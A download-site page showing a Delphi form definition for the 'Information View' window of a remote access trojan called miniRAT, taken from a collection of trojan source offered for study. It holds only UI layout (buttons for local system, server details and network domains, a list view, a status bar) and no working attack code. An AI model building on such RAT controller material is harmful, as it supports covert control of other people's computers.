⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 untinformationview.dfm

📁 木马源程序,供大家研究
💻 DFM
字号:
object Form3: TForm3
  Left = 633
  Top = 374
  Width = 305
  Height = 261
  Caption = 'miniRAT - Information View'
  Color = clBtnFace
  Constraints.MinHeight = 261
  Constraints.MinWidth = 305
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'Tahoma'
  Font.Style = []
  OldCreateOrder = False
  OnClose = FormClose
  DesignSize = (
    297
    234)
  PixelsPerInch = 96
  TextHeight = 13
  object Label1: TLabel
    Left = 8
    Top = 32
    Width = 281
    Height = 17
    AutoSize = False
    Caption = 'Network domains may be really slow, so please be patient'
  end
  object ListView1: TListView
    Left = 8
    Top = 48
    Width = 281
    Height = 161
    Anchors = [akLeft, akTop, akRight, akBottom]
    Columns = <
      item
        Caption = 'Information'
        Width = 130
      end
      item
        Caption = 'Value'
        Width = 130
      end>
    ColumnClick = False
    GridLines = True
    ReadOnly = True
    RowSelect = True
    TabOrder = 0
    ViewStyle = vsReport
  end
  object StatusBar1: TStatusBar
    Left = 0
    Top = 217
    Width = 297
    Height = 17
    Panels = <
      item
        Text = '0'
        Width = 70
      end
      item
        Text = '127.0.0.1:0000'
        Width = 50
      end>
    SimplePanel = False
  end
  object Button1: TButton
    Left = 8
    Top = 8
    Width = 89
    Height = 21
    Caption = 'Local System'
    TabOrder = 2
    OnClick = Button1Click
  end
  object Button2: TButton
    Left = 104
    Top = 8
    Width = 89
    Height = 21
    Caption = 'Server Details'
    TabOrder = 3
    OnClick = Button2Click
  end
  object Button3: TButton
    Left = 200
    Top = 8
    Width = 89
    Height = 21
    Hint = 'This function might take up to one or more minutes.'
    Caption = 'Network Domains'
    ParentShowHint = False
    ShowHint = True
    TabOrder = 4
    OnClick = Button3Click
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -